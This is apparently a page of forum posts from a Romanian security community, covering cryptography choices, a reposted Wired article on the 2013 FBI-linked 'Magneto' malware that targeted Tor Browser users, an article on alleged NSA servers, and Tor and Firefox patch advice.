    1. RC4 nu se compara cu AES. EVITA RC4! Nu stiu care e cel mai bun, dar daca pe schimbul de chei (asimetric) ai o cheie RSA de 2048 de biti iar pentru cryptarea simetrica, AES, ai 256 de biti, ar trebui sa fie de ajuns sa nu iti faci probleme. Sugerez totusi folosirea curbelor eliptice (ECDH) pentru schimb de chei, iar pentru cryptarea simetrica, sa se foloseasca GCM-ul ca mod de functionare pentru AES. 2. Deoarece cu cat un algoritm e mai simplu, cu atat e mai usor de "spart". Nu stiu sa iti zic de ce, dar eu iau in considerare posibilitatea ca in cazul in care se intercepteaza date, guvernele sa poata "sparge" traficul cryptat. Teoretic, folosesc asta pentru compatibilitate si cu browsere mai vechi si pentru viteza mai mare de incarcare a paginilor. 3. Daca te referi la algoritm de cryptare simetrica, e cam inutil si foarte lent, practic nu ar avea rost. In cel mai rau caz 512 biti pentru cheie sunt de ajuns. Gandeste-te cat timp ar lua sa incerce cineva 2^512 (2 la puterea 512) de combinatii pentru o cheie... 4. Stiu ca a fost un concurs pe NIST, pentru un algoritm care sa inlocuiasca SHA-ul. Rezultatul, cel mai bun algoritm ales, este Keccak, adica da, SHA3. Daca esti paranoic, folosesti versiunea pe 512 biti, dar nu stiu daca e chiar asa necesara, deoarece e o functie pentru calcularea unui hash, deci pentru asigurarea integritatii datelor, nu pentru protejarea acestora.
  18. La final cred ca ar fi ok un examen din tot
  19. Win32 Egg Hunter http://www.youtube.com/watch?v=c630azKzxeM&feature=player_embedded Description: Detailed Tutorial on Win32 Egg Hunter Implementation. Ajin Abraham @ajinabraham Kerala Cyber Force www.keralacyberforce.in Sursa: Win32 Egg Hunter
  20. Feds Are Suspects in New Malware That Attacks Tor Anonymity By Kevin Poulsen 08.05.13 3:57 AM Security researchers tonight are poring over a piece of malicious software that takes advantage of a Firefox security vulnerability to identify some users of the privacy-protecting Tor anonymity network. The malware showed up Sunday morning on multiple websites hosted by the anonymous hosting company Freedom Hosting. That would normally be considered a blatantly criminal “drive-by” hack attack, but nobody’s calling in the FBI this time. The FBI is the prime suspect. “It just sends identifying information to some IP in Reston, Virginia,” says reverse-engineer Vlad Tsyrklevich. “It’s pretty clear that it’s FBI or it’s some other law enforcement agency that’s U.S.-based.” If Tsrklevich and other researchers are right, the code is likely the first sample captured in the wild of the FBI’s “computer and internet protocol address verifier,” or CIPAV, the law enforcement spyware first reported by WIRED in 2007. Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists, and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor. The code has been used sparingly in the past, which kept it from leaking out and being analyzed or added to anti-virus databases. The broad Freedom Hosting deployment of the malware coincides with the arrest of Eric Eoin Marques in Ireland on Thursday on an U.S. extradition request. The Irish Independent reports that Marques is wanted for distributing child pornography in a federal case filed in Maryland, and quotes an FBI special agent describing Marques as “the largest facilitator of child porn on the planet.” Freedom Hosting has long been notorious for allowing child porn to live on its servers. In 2011, the hactivist collective Anonymous singled out Freedom Hosting for denial-of-service attacks after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network. Freedom Hosting is a provider of turnkey “Tor hidden service” sites — special sites, with addresses ending in .onion — that hide their geographic location behind layers of routing, and can be reached only over the Tor anonymity network. Tor hidden services are ideal for websites that need to evade surveillance or protect users’ privacy to an extraordinary degree – which can include human rights groups and journalists. But it also naturally appeals to serious criminal elements. Shortly after Marques’ arrest last week, all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. That included websites that had nothing to do with child pornography, such as the secure email provider TorMail. Some visitors looking at the source code of the maintenance page realized that it included a hidden iframe tag that loaded a mysterious clump of Javascript code from a Verizon Business internet address located in Virginia. By midday Sunday, the code was being circulated and dissected all over the net. Mozilla confirmed the code exploits a critical memory management vulnerability in Firefox that was publicly reported on June 25, and is fixed in the latest version of the browser. Though many older revisions of Firefox are vulnerable to that bug, the malware only targets Firefox 17 ESR, the version of Firefox that forms the basis of the Tor Browser Bundle – the easiest, most user-friendly package for using the Tor anonymity network. “The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based,” the non-profit Tor Project wrote in a blog post Sunday. “We’re investigating these bugs and will fix them if we can.” The inevitable conclusion is that the malware is designed specifically to attack the Tor browser. The strongest clue that the culprit is the FBI, beyond the circumstantial timing of Marques’ arrest, is that the malware does nothing but identify the target. The payload for the Tor Browser Bundle malware is hidden in a variable called “magneto”. The heart of the malicious Javascript is a tiny Windows executable hidden in a variable named “Magneto.” A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box. But the Magneto code doesn’t download anything. It looks up the victim’s MAC address — a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sends it to the Virginia server, outside of Tor, to expose the user’s real IP address, and coded as a standard HTTP web request. “The attackers spent a reasonable amount of time writing a reliable exploit, and a fairly customized payload, and it doesn’t allow them to download a backdoor or conduct any secondary activity,” says Tsyrklevich, who reverse-engineered the Magneto code. The malware also sends, at the same time, a serial number that likely ties the target to his or her visit to the hacked Freedom Hosting-hosted website. In short, Magneto reads like the x86 machine code embodiment of a carefully crafted court order authorizing an agency to blindly trespass into the personal computers of a large number of people, but for the limited purpose of identifying them. But plenty of questions remain. For one, now that there’s a sample of the code, will anti-virus companies start detecting it? Update 8.5.13 12:50: According to Domaintools, the malware’s command-and-control IP address in Virginia is allocated to Science Applications International Corporation. Based in McLean, Virginia, SAIC is a major technology contractor for defense and intelligence agencies, including the FBI. I have a call in to the firm. 13:50 Tor Browser Bundle users who installed or manually updated after June 26 are safe from the exploit, according to the Tor Project’s new security advisory on the hack. 14:30: SAIC has no comment. 15:10: There are incorrect press reports circulating that the command-and-control IP address belongs to the NSA. Those reports are based on a misreading of domain name resolution records. The NSA’s public website, NSA.gov, is served by the same upstream Verizon network as the Tor malware command-and-control server, but that network handles tons of government agencies and contractors in the Washington DC area. 8.6.13 17:10: SAIC’s link to the IP addresses may be an error in Domaintools’ records. The official IP allocation records maintained by the American Registry for Internet Numbers show the two Magneto-related addresses are not part of SAIC’s publicly-listed allocation. They’re part of a ghost block of eight IP addresses that have no organization listed. Those addresses trace no further than the Verizon Business data center in Ashburn, Virginia, 20 miles northwest of the Capital Beltway. (Hat tip: Michael Tigas) Sursa: Feds Are Suspects in New Malware That Attacks Tor Anonymity | Threat Level | Wired.com
  21. Nytro

    .

    Da, e super, pacat ca foloseste MHook, era mai 1337 fara sa foloseasca...
  22. CAZUL DE SPIONAJ INFORMATIC: Un server apar?inând NSA s-ar afla ?i în România. HARTA ??rilor în care ar exista servere de Valentin Vidu - Mediafax Site-ul Cryptome.org a publicat o list? de ??ri ?i un planiglob pe care sunt marcate puncte ro?ii despre care afirm? c? "ar putea fi locuri simbolice sau ar putea indica (existen?a) unor servere X-Keyscore apar?inând NSA la ambasade ale Statelor Unite", inclusiv în România. Potrivit site-ului, care nu precizeaz? vreo surs?, de?i unele locuri în care se afl? servere sunt cunoscute ca "sta?ii de spionaj NSA-Echeleon în cadrul Five-Eyes - Statele Unite, Marea Britanie, Canada, Australia ?i Noua Zeeland? -, multe dintre locurile serverelor sunt marcate în capitalele acestor state sau în apropiere de capitale". Site-ul consider? o "surpriz?" punctul de la Moscova ?i noteaz? c? alt punct apare în partea central? din sudul Chinei, departe de Beijing, apreciind c? ar fi un "server clandestin". De asemenea, site-ul remarc?c? sta?ia NSA din Hawaii, unde a lucrat Edward Snowden, nu apare pe hart?. Pe planiglob sunt marcate aproximativ 85 de puncte în care s-ar afla "aproximativ 150 de situri", 25 de puncte aflându-se pe coastele Antarcticii. Puncte ro?ii apar, de asemenea, în 51 de ??ri. Cea mai dens? concentrare este în Europa, Orientul Mijlociu, Asia de Sud ?i America Central?, observ? site-ul, care subliniaz? c? "niciunul nu apare în zone ca Norvegia, Suedia, Islanda, Canada, în cea mai parte din America de Sud, Pacific ?i insulele din Atlantic. Cryptome.org consider? c? "ar fi logic ca Agen?ia Na?ional? american? pentru Securitate (NSA) s? utilizeze ambasadele americane ca pe avanposturi pentru colectarea (datelor) comunica?iilor locale cu ajutorul X-Keyscore", notând c? ambasadele au fost folosite pentru "întregul spectru al spionajului în toate formele ?i deghiz?rile sale, militar, politic, economic, social" ?i conchizând c? "ad?ugarea aspectului cibernetic era inevitabil?". Site-ul argumenteaz? c? ambasadele de?in re?ele multiple de comunicare de la cele mai de jos nivele de securitate, pân? la cele mai înalte. Aceea?i surs? adaug? c? alte noi dezv?luiri de documente provenind de la Edward Snowden ar putea s? descrie cum este realizat acest lucru de c?tre personal, re?ele ?i arhitectura serverelor de date, nu doar prin programele PRISM ?i X-Keyscore. Cryptome.org este o bibliotec? digital? pentru g?zduire, creat? în 1996 de c?tre cercet?tori americani independen?i ?i arhitec?ii John Young ?i Deborah Natsios. Biblioteca func?ioneaz? ca loc de stocare a unor informa?ii despre libertatea de exprimare, criptografie, spionaj ?i supraveghere. Cryptome î?i asum? ca misiune, pe site, "s? primeasc? spre publicare documente care sunt interzise de guverne în întreaga lume, în particular materiale despre libertatea de exprimare, confiden?ialitate, criptologie, tehnologii cu dubl? utilizare, securitatea na?ional?, informa?ii (secrete) ?i guvernan?? secret? - documente declasificate, secrete ?i clasificate - dar nu se limiteaz? doar la acestea". Sursa: CAZUL DE SPIONAJ INFORMATIC: Un server apar?inând NSA s-ar afla ?i în România. HARTA ??rilor în care ar exista servere - Mediafax
  23. Da, tot 17 ramane, dar include patch-urile necesare: https://blog.torproject.org/blog/tor-security-advisory-old-tor-browser-bundles-vulnerable
  24. Da. Cei care inca nu aveti Firefox 22 ati face bine sa faceti update. Si e un exemplu bun de a contrazice "Firefox e mai sigur ca IE". Bine, folositi Chrome.
×
×
  • Create New...